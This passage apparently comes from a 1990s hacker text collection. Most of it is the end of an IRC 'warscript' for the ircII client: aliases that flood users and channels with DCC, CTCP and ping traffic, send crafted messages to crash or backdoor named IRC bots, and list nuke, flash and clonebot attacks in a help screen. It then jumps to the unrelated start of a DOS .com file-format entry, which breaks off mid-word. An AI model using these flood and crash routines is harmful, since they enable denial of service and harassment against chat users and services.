^dcc raw $FB[$XX] $SR NOTICE $0 :$JUNKSTR EVAL ^timer 9 ^dcc raw $FB[$XX] $SR NOTICE $0 :$JUNKSTR EVAL ^timer 12 ^dcc raw $FB[$XX] $SR NOTICE $0 :$JUNKSTR EVAL ^timer 16 ^dcc raw $FB[$XX] $SR NOTICE $0 :$JUNKSTR } EVAL ^timer 20 ^dcc raw $FB[0] $SR QUIT :$TSU EVAL ^timer 20 ^dcc raw $FB[1] $SR QUIT :$TSU EVAL ^timer 20 ^dcc raw $FB[2] $SR QUIT :$TSU } {/sxecho Error connecting to $SR\.} ^assign -FB[0] ^assign -FB[1] ^assign -FB[2] ^assign -SR ^assign -PT ^set -input_prompt } {/sxecho Usage: /FLOOD [] []} } ### BACKDOOR/BOT KILLER Add Ons (by Maeglar, Modified by Vassago) # Thanks go to the Knights of IRC for these interesting aliases. alias wskill { sxecho Sending WSIRC Kill to Channel $C\. //ctcp $C a } alias vkill1 { if ([$0]) { sxecho Trying to SIGSEV VladBot $0, please wait... //^dcc chat $0 //^msg $0 note create public time to die //^msg $0 note delline //^msg $0 note delline 8 if ([$1]) {/vkill1 $1-} } {/sxecho Usage: /VKILL1 .} } ALIAS VKILL2 { if ([$0]) { //dcc chat $0 //msg $0 note create public 4 m-eye frendz //msg $0 note delline 2 } {/sxecho Usage: /VKILL2 .} } alias vkill3 { if ([$0]) { //dcc chat $0 wait dccflood $0 ^timer 15 dccflood $0 ^timer 30 dccflood $0 } {/sxecho Usage: /VKILL3 .} } alias com1 { if ([$0]) { //^msg $0 dcc sxecho Trying to SIGSEV ComBot $0 with the DC bug... if ([$1]) {/com1 $1-} } {/sxecho Usage: /COM1 .} } alias com2 { if ([$0]) { //^msg $0 bleaht33h33bleah quit :SIGSEV - Fuck I'm a stupid dickhead like my owner. sxecho Trying to backdoor ComBot $0 to quit... if ([$1]) {/com2 $1-} } {/sxecho Usage: /COM2 .} } alias com3 { if ([$0]) { //^msg $0 seen %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% sxecho Trying to SIGSEV ComBot $0 with the seen bug... if ([$1]) {/com3 $1-} } {/sxecho Usage: /COM3 .} } alias cc { if ([$0]) { //^msg $0 sxecho Trying to get ComBot command character from $0. if ([$1]) {/cc $1-} } {/sxecho Usage: /CC .} } alias hc { if ([$0]) { //^ctcp $0 cmdchar sxecho Trying to obtain HackBot command character from $0... if ([$1]) {/hc $1-} } {/sxecho Usage: /HC .} } alias dweeb { if ([$0]) { //^ctcp $0 ooook sxecho Trying to kill $0 with the DweeBot backdoor... if ([$1]) {/dweeb $1-} } {/sxecho Usage: /DWEEB .} } alias hackkill { if ([$2]) { sxecho Attempting to kill the hackbot $0\... sxecho If you have no DCC CHAT connection to $0\ this will not work. //^msg =$0 $1\stats $2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2 } { sxecho USAGE: /hackkill sxecho You can get the command character by typing /HC . sxecho You ALSO need to have an active DCC CHAT with . } } alias hackkill2 { if ([$0]) { sxecho Trying to SIGSEV HackBot $0\... //ctcp $0 ACTION } { sxecho Sending SIGSEV for HackBots to $C\... //ctcp $C ACTION } } ### WAR Help Commands alias pause2 { ^assign PAUSETEMP $"-Enter to Continue-" ^assign -PAUSETEMP } alias WARHELP { echo +----------------------------------------------------------------------+ echo | - + Scythe IRC Warscript by Vassago - Command HELP + - | echo +----------------------------------------------------------------------+ echo | /NICKMDOP - Does a mega deop with nick change, deops by 4. | echo | /K(name) - Sets a channel key bomb: /kdie, /kfont, /kinvert, | echo | /kinvert, /ksz, /kcls, /kfire, /kreset, /ksatan, /ktsunami. | echo | /CBOTS HELP - Gives you an extended help on the Serpent script | echo | clonebots collision killer. This killer uses script clonebots | echo | much like Vassago's Serpent Collision Script v2.12 did. | echo | /KILLHOST (server) - Changes the collision killer host to . | echo | /CLONE (bot # or ALL) (action) - Tells your clonebots to do .| echo | Type /CLONE HELP to view the examples and lists of actions. | echo | /CLONEBOTS HELP - Gives you an extended help on Clonebots & commands.| echo | /CLONESPY HELP - Gives you an extended help on Clonebots spy Levels. | echo | /OPCLONES - Ops all of YOUR clonebots on your current channel. | echo | /CK - Kills (disconnects) all clonebots. | echo | /ASSAULT (nick/#channel) - Starts an assault program, a really nasty | echo | one, on . This attempts to flood them off IRC. | echo | /TSUNAMI (nick/channel) - Dumps the TSUNAMI string to .| echo | /NICKFLOOD (#) - Does a random nick flood with numbers, changes <#>. | /pause2 echo | /DCCFLOOD (nick) - Sends a really nasty DCC CHAT flood to . | echo | /DCCBOMB (nick) - Sends a DCC autoget bomb to . | echo | /DCCTSUNAMI (nick) - Tsunamis with DCC SENDs. | echo | /PINGFLOOD (nick/channel) - Ping floods . | echo | /PONGFLOOD (nick) - Pong floods . | echo | /TOOLZBOMB (nick/channel) - CTCP ToolZ floods the person. | echo | /VERFLOOD (nick/channel) - CTCP VER floods the person. | echo | /MULTIFLOOD - Sends them a little of each type of flood. | echo | /SEDFLOOD - Floods with CTCP "SED" (Gives them Encrypted Message). | echo | /CTCPFLOOD (nick/channel) - CTCP CLIENTINFO Floods . | echo | /SERVFLOOD (server) (count) - Floods all umode +s people on .| echo | /FLASH (nick) - Flashes . You must have flash.c compiled | echo | to use. See variables at top of this script. | echo | /MFLASH (nick) - Mail flashes . You must have mflash.c. | echo | /MASSFLASH - Flashes everyone on your current channel. | echo | /NUKE (nick) - Nukes . You must have nuke.c compiled, in your | echo | current directory, and have root access to use this command. | echo | /SNUKE (server) - Nukes . (See above restrictions). | echo | Note: the default filenames, etc. for nuke and flash can be edited | echo | by manually changing the variables at the beginning of the script. | pause2 echo | +--+ CURRENT BACKDOOR ATTEMPTERS +---------------------------------+ | echo | /WSKILL - Kills all WSIRC users on your current channel. | echo | /VKILL1 - Attempts to SIGSEV VladBots. | echo | /VKILL2 - Kills newer vlad versions. | echo | /VKILL3 - Kills 3.01 vlad versions. | echo | /COM1 - Uses ComBot DCC SIGSEV. | echo | /COM2 - Uses ComBot bleaht33h33bleah Kill. | echo | /COM3 - Uses ComBot seen SIGSEV. | echo | /CC - Gets ComBot command character. | echo | /HC - Gets HackBot command character. | echo | /DWEEB - Attempts to Backdoor DweeBots. | echo | /HACKKILL - This will | echo | attempt to kill a HackBot also, but you need a DCC CHAT connection.| echo | /HACKKILL2 - Attempts to SIGSERV HackBots. | echo +----------------------------------------------------------------------+ } assign LOADING LOADING EVAL ^killhost $DEFAULTKILLHOST EVAL //^mode $N +i EVAL $srand($time()) EVAL ^assign JUNKSTR $tolower($encode($encode($encode($randcrap(2)$encode($encode($encode($randcrap(8)))))))) EVAL ^assign CJUNKSTR $randcrap(4) echo [S/X] For the latest versions of all Vassago's scripts you should FTP EVAL echo [S/X] to Vassago's Public Domain IRC site at jcowan.reslife.okstate.edu. echo [S/X] DO NOT use this script unless you get it directly from my FTP site! echo [S/X] SCYTHE IRC Warscript is now loaded. Type /WARHELP for HELP. []------------------[] -----------------------------------+ 06 - Guide to DOS .com executables | -----------------------------------+ COM Format Intel byte order Information from File Format List 2.0 by Max Maischein. --------!-CONTACT_INFO---------------------- If you notice any mistakes or omissions, please let me know! It is only with YOUR help that the list can continue to grow. Please send all changes to me rather than distributing a modified version of the list. This file has been authored in the style of the INTERxxy.* file list by Ralf Brown, and uses almost the same format. Please read the file FILEFMTS.1ST before asking me any questions. You may find that they have already been addressed. Max Maischein Max Maischein, 2:244/1106.17 Max_Maischein@spam.fido.de corion@informatik.uni-frankfurt.de Corion on #coders@IRC --------!-DISCLAIMER------------------------ DISCLAIMER: THIS MATERIAL IS PROVIDED "AS IS". I verify the information contained in this list to the best of my ability, but I cannot be held responsible for any problems caused by use or misuse of the information, especially for those file formats foreign to the PC, like AMIGA or SUN file formats. If an information it is marked "guesswork" or undocumented, you should check it carefully to make sure your program will not break with an unexpected value (and please let me know whether or not it works the same way). Informatio